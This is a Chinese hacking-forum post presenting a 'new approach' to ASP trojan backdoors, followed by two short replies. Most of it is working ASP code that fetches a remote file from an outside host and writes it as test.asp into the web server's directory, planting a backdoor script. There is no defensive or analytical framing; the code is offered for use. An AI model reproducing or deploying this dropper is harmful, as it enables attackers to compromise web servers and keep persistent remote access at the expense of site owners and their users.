ASP木马后门新思路
《新概念黑客基地》技术文章<%
Function GetPage(url)
dim Retrieval
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False ', "", ""
.Send
GetPage = BytesToBstr(.ResponseBody)
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
on error resume next
Url="http://www.heibai.org/hacker/daemon.txt"
response.write "开始取得远程代码........"
wstr = GetPage(Url)
Set fs=Server.CreateObject("Scripting.FileSystemObject")
Set CrFi=fs.CreateTextFile(server.MapPath("./")&"\test.asp")
Crfi.Writeline(wstr)
set CrFi=nothing
set fs=nothing
response.write "...生成test.asp文件成功"
%> 这是什么啊?看不懂。。。。
{:3_61:} 谢谢楼主分享了啊,
页:
[1]